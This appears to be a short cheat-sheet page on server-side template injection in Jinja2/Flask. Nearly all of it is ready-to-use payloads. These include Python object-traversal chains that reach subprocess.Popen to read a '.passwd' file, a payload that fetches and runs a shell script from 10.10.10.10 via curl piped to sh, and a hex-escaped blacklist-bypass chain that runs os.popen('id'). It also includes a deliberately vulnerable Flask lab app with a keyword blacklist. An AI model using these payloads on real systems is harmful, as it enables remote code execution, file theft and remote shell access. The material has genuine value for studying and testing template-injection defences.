SSTI
Todo
{{''.__class__.__mro__[1].__subclasses__()}}We need to find `subprocess.Popen`
{{''.__class__.__mro__[1].__subclasses__()[250:]}}{{''.__class__.__mro__[1].__subclasses__()[408]("cat+.passwd",shell=True,stdout=-1).communicate()[0].strip()}}{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('curl+10.10.10.10/shell|sh')}}{{ self._TemplateReference__context.joiner.__init__.__globals__.os }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os }}Basic Lab
from flask import Flask, request, render_template_string
app = Flask(__name__)
blacklist = ['.', '}}', '*', '[', ']', "'", '{{', '_', '+', '/', '-', '<', '>', 'self', 'globals', 'builtins', 'import', 'init', 'class', 'mro', 'getitem', 'config', 'base', 'safe']
@app.route('/')
def index():
param = request.args.get('cmd', '')
error = None
if any(blacklisted_word in param for blacklisted_word in blacklist):
error = "L'utilisation de certains mots n'est pas autorisée."
return render_template_string("Error")
return render_template_string(param, error=error)
if __name__ == '__main__':
app.run(debug=True)
{%with+a=request|attr("<@hex_escapes>application<@/hex_escapes>")|attr("<@hex_escapes>__globals__<@/hex_escapes>")|attr("<@hex_escapes>__getitem__<@/hex_escapes>")("<@hex_escapes>__builtins__<@/hex_escapes>")|attr("<@hex_escapes>__getitem__<@/hex_escapes>")("<@hex_escapes>__import__<@/hex_escapes>")("os")|attr("<@hex_escapes>popen<@/hex_escapes>")("<@hex_escapes>id<@/hex_escapes>")|attr("<@hex_escapes>read<@/hex_escapes>")()%}{%print(a)%}{%endwith%}References
Last updated